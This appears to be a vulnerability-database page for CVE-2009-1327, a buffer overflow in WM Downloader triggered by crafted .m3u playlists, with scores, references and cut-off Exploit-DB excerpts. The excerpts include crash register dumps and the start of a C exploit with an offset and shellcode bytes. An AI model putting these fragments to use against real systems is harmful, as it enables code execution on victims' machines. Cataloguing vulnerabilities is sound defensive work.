CVE-2009-1327
published 2009-04-17CVE-2009-1327: Stack-based buffer overflow in Mini-stream WM Downloader 3.0.0.9 allows remote attackers to execute arbitrary code via a long URI in a playlist (.m3u) file.
PriorityP343critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
6.03%
92.4th percentile
Stack-based buffer overflow in Mini-stream WM Downloader 3.0.0.9 allows remote attackers to execute arbitrary code via a long URI in a playlist (.m3u) file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mini-stream | wm_downloader | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WM Downloader - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 WM Downloader - '.m3u' Local Stack Overflow (PoC)
WM Downloader - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# *************************************************************
# * WM Downloader (.M3U File) Local Stack Overflow POC *
# *************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/WMDownloader.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D00000
#EBX 00333D78 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F739C
#EBP 000FBFB4
#ESI 77C2FCE0 msvcrt.77C2FCE0
#EDI 00006619
#EIP 41414
Exploit-DB
RM Downloader - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 RM Downloader - '.m3u' Local Stack Overflow (PoC)
RM Downloader - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# *********************************************************
# * RM Downloader (.M3U File) Local Stack Overflow POC *
# *********************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/RMDownloader.exe
#
#
# Olly registers
#EAX 00000001
#ECX 7C92056D ntdll.7C92056D
#EDX 00A20000
#EBX 00104A54
#ESP 000FFE3C
#EBP 00333E98 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESI 77C2FCE0 MSVCRT.77C2FCE0
#EDI 0000660D
#EI
Exploit-DB
WM Downloader 3.0.0.9 - '.m3u' Universal Stack Overflow
exploitdb·2009-04-13
CVE-2009-1327 WM Downloader 3.0.0.9 - '.m3u' Universal Stack Overflow
WM Downloader 3.0.0.9 - '.m3u' Universal Stack Overflow
---
/*
# WM Downloader Version 3.0.0.9 .m3u Universal Stack Overflow Exploit
# Disoverd By Cyber-Zone
# Exploited By Stack
# Thnx : HOD The Best Metasploiter
*/
#include
#include
#include
#define OFFSET 26117
char header1[]="\x23\x45\x58\x54\x4D\x33\x55\r\n";
char header2[]="http://";
char scode[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x
Exploit-DB
Mini-stream Ripper - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 Mini-stream Ripper - '.m3u' Local Stack Overflow (PoC)
Mini-stream Ripper - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# *************************************************************
# * Mini-stream Ripper (.M3U File) Local Stack Overflow POC *
# *************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/Mini-streamRipper.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D30000
#EBX 00333D60 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F70CC ASCII "AAAA"
#EBP 000FBFB4
#ESI 77C2FCE0 msvcrt.77C2F
Exploit-DB
Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow (PoC)
Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# ************************************************************************
# * Mini-stream RM-MP3 Converter (.M3U File) Local Stack Overflow POC *
# ************************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/Mini-streamRM-MP3Converter.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D20000
#EBX 00333ED8 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000
Exploit-DB
ASX to MP3 Converter - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 ASX to MP3 Converter - '.m3u' Local Stack Overflow (PoC)
ASX to MP3 Converter - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# ************************************************************************
# * ASX to MP3 Converter (.M3U File) Local Stack Overflow POC *
# ************************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/ASXtoMP3Converter.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D30000
#EBX 00333ED8 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F6C90
#EBP 000FBFB4
#ESI 77C2FCE0
No writeups or analysis indexed.
http://secunia.com/advisories/34674http://www.securityfocus.com/bid/34494https://exchange.xforce.ibmcloud.com/vulnerabilities/49842https://www.exploit-db.com/exploits/8403https://www.exploit-db.com/exploits/8411http://secunia.com/advisories/34674http://www.securityfocus.com/bid/34494https://exchange.xforce.ibmcloud.com/vulnerabilities/49842https://www.exploit-db.com/exploits/8403https://www.exploit-db.com/exploits/8411
2009-04-17
Published